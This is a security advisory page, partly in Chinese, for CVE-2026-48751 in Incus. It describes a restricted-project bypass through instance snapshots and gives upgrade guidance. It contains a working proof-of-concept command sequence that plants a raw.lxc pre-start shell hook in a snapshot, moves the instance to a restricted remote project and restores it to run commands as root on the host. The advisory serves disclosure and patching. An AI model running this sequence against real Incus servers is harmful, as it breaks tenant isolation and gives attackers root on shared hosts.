CVE-2026-48751
Incus has a restricted project bypass leading to arbitrary command execution
描述
### Summary Instance snapshots ignore the `restricted.containers.lowlevel=block` setting; allowing for arbitrary command execution on the Incus server by abusing lowlevel hooks such as `raw.lxc` and `raw.qemu`. ### Details Instance snapshots ignore the `restricted.containers.lowlevel=block` setting; allowing for arbitrary command execution on the Incus server by abusing lowlevel hooks such as `raw.lxc` and `raw.qemu`. As snapshots can be moved from one server to another, a malicious instance+snapshot can be crafted locally, moved to a restricted project and the snapshot restored for arbitrary command execution. In practice, this allows a malicious actor to execute arbitrary commands on the host with root privileges. ### PoC ``` # remote, restricted incus project set rem:project restricted.true incus project set rem:project restricted.containers.lowlevel=block # locally, unrestricted project incus init images:debian/trixie rce-raw-lxc incus config set rce-raw-lxc raw.lxc='lxc.hook.pre-start = /bin/sh -c "/bin/id >/lxc-hook-prestart"' incus snapshot create rce-raw-lxc snap0 #> allow transfer to restricted project incus config unset rce-raw-lxc raw.lxc # locally, transfer and trigger incus move rce-raw-lxc rem: --mode push incus snapshot restore rem:rce-raw-lxc snap0 incus start rem:rce-raw-lxc ``` ### Impact - Bypass of project restrictions. - Arbitrary command execution on the Incus server.
如何修補 CVE-2026-48751
要修補 CVE-2026-48751,請將受影響套件升級到下列已修補版本。
- —未列出修補版本
- —未列出修補版本
- —升級至 7.2.0 或更新版本
CVE-2026-48751 正在被利用嗎?
目前沒有被利用訊號。CVE-2026-48751 既不在 CISA KEV 也沒有最新的 EPSS 分數。
受影響套件(3)
- from 0